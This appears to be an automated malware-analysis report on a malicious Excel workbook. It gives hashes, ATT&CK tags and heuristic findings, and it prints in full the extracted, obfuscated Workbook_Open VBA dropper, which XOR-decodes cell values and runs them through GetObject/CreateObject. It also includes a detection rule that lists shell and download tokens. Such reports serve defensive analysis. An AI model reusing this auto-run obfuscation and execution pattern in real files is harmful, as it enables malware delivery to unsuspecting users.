Office (OLE) / .XLS malware analysis — malicious · 00e77355e35927bb

MALICIOUS

Office (OLE) / .XLS

40.5 KB Created: 2023-05-16 20:24:32 Authoring application: Microsoft Excel First seen: 2023-05-19

MD5: 6b646f78ecaa120f33f8be8867d43d2a SHA-1: 6664cd0853992d7c4361c04930abb9ab59ce65f2 SHA-256: 00e77355e35927bbdca2fdebe7c8251af91d1ab90a5cd58957fd7587ef4fd71a

148 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an Excel file containing a Workbook_Open VBA macro. This macro is designed to execute obfuscated code that retrieves values from specific cells in the 'q8719' sheet, likely to construct a command or URL. The GetObject and CreateObject calls, along with the Workbook_Open auto-execution, strongly indicate an attempt to download and run a second-stage payload, which is a common technique for malware delivery.

Heuristics 5

VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

                GetObject(Sought).CreateObject(Danger).Run RetuRning, 0

GetObject call high OLE_VBA_GETOBJ

GetObject call

Matched line in script

                GetObject(Sought).CreateObject(Danger).Run RetuRning, 0

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4458 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4458 bytes
SHA-256: `0514e10258f8a55f15d89eb9cbf4cd2839f9a62b29699a000dd0f3fa855d4f0d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Option Explicit Private EngagE As String Private Discipline As String Private PhotoshoP As String Sub Workbook_Open() GoTo EvaluatEd Dim Palestinian As String Palestinian = InputBox("first number") Dim RequiRing As String RequiRing = InputBox("last number") MsgBox Palestinian MsgBox RequiRing EvaluatEd: If Palestinian = "" Then TableT End If End Sub Private Sub TableT() Dim Sought As String, RetuRning As String, Danger As String GoTo RetuRning Margaret: GetObject(Sought).CreateObject(Danger).Run RetuRning, 0 Exit Sub Nepal: Sought = Intent(EngagE): RetuRning = Intent(Discipline): Danger = Intent(PhotoshoP) GoTo Margaret RetuRning: EngagE = Sheets("q8719").Range("G192").Value: Discipline = Sheets("q8719").Range("H169").Value: PhotoshoP = Sheets("q8719").Range("E197").Value GoTo Nepal Dim Palestinian As String Palestinian = InputBox("") End Sub Private Function Charm(ByVal Imports As String) As Variant Dim Justin() As Byte, i As Long, Camel As Integer, EvaluatEd As Integer EvaluatEd = Len(Imports) / 2: i = 0: ReDim Justin(0 To EvaluatEd) As Byte Palestinian: If i < Len(Imports) Then Camel = Camel + 1 Justin(Camel - 1) = Chr(14 + (12 * 2)) & "H" & Mid(Imports, i + 1, 2) i = i + 2 GoTo Palestinian Else GoTo RequiRing End If RequiRing: Charm = Justin End Function Private Function Intent(ByVal InterventIon As String) As Variant Dim DeemeD As Long: DeemeD = 0: Dim Promoting() As Byte: Dim SuSpenSion() As Byte, Justin As String, Camel As Integer SuSpenSion = "s79f158f83" GoTo HouseHolds Fewer: Dim RequiRing As String RequiRing = InputBox("check result") MsgBox RequiRing Genetics: If DeemeD < UBound(Promoting) Then Camel = DeemeD Mod (10) GoTo Sought RetuRning: Justin = Justin & Chr(Promoting(DeemeD)) DeemeD = DeemeD + 1 GoTo Genetics Else GoTo Slave End If Imports: Dim Palestinian As String Palestinian = InputBox("enter your value") Slave: Intent = Justin Exit Function HouseHolds: Promoting = Charm(InterventIon) GoTo Genetics Sought: Promoting(DeemeD) = Abs(Promoting(DeemeD) Xor SuSpenSion(Camel * 2)) GoTo RetuRning End Function Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: 0514e10258f8a55f15d89eb9cbf4cd2839f9a62b29699a000dd0f3fa855d4f0d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private EngagE As String






                                        Private Discipline As String
Private PhotoshoP As String
Sub Workbook_Open()
GoTo EvaluatEd







          




                                                Dim Palestinian As String







               Palestinian = InputBox("first number")
Dim RequiRing As String
RequiRing = InputBox("last number")








                MsgBox Palestinian
MsgBox RequiRing








EvaluatEd:
If Palestinian = "" Then





              TableT





           





                                                                    End If






                  End Sub
Private Sub TableT()
Dim Sought As String, RetuRning As String, Danger As String








                   GoTo RetuRning
Margaret:







                GetObject(Sought).CreateObject(Danger).Run RetuRning, 0
Exit Sub







Nepal:
Sought = Intent(EngagE): RetuRning = Intent(Discipline): Danger = Intent(PhotoshoP)






                                                GoTo Margaret
RetuRning:





                                                                




                EngagE = Sheets("q8719").Range("G192").Value: Discipline = Sheets("q8719").Range("H169").Value: PhotoshoP = Sheets("q8719").Range("E197").Value
GoTo Nepal
Dim Palestinian As String
Palestinian = InputBox("")
End Sub





               Private Function Charm(ByVal Imports As String) As Variant
Dim Justin() As Byte, i As Long, Camel As Integer, EvaluatEd As Integer








            EvaluatEd = Len(Imports) / 2: i = 0: ReDim Justin(0 To EvaluatEd) As Byte





          




Palestinian:
If i < Len(Imports) Then
Camel = Camel + 1
Justin(Camel - 1) = Chr(14 + (12 * 2)) & "H" & Mid(Imports, i + 1, 2)
i = i + 2
GoTo Palestinian
Else
GoTo RequiRing
End If
RequiRing:
Charm = Justin
End Function





               





          Private Function Intent(ByVal InterventIon As String) As Variant






                Dim DeemeD As Long: DeemeD = 0: Dim Promoting() As Byte: Dim SuSpenSion() As Byte, Justin As String, Camel As Integer





           SuSpenSion = "s79f158f83"
GoTo HouseHolds
Fewer:
Dim RequiRing As String





                                                        RequiRing = InputBox("check result")





                                                            MsgBox RequiRing





Genetics:
If DeemeD < UBound(Promoting) Then
Camel = DeemeD Mod (10)
GoTo Sought
RetuRning:








                                        





                                                            Justin = Justin & Chr(Promoting(DeemeD))






                                                                            DeemeD = DeemeD + 1






                                                                    GoTo Genetics







                                                Else






                                                    GoTo Slave
End If





Imports:





                                                    Dim Palestinian As String
Palestinian = InputBox("enter your value")
Slave:








                  Intent = Justin
Exit Function
HouseHolds:






                                                                    Promoting = Charm(InterventIon)
GoTo Genetics
Sought:






                                                                Promoting(DeemeD) = Abs(Promoting(DeemeD) Xor SuSpenSion(Camel * 2))








                





                                                        GoTo RetuRning
End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.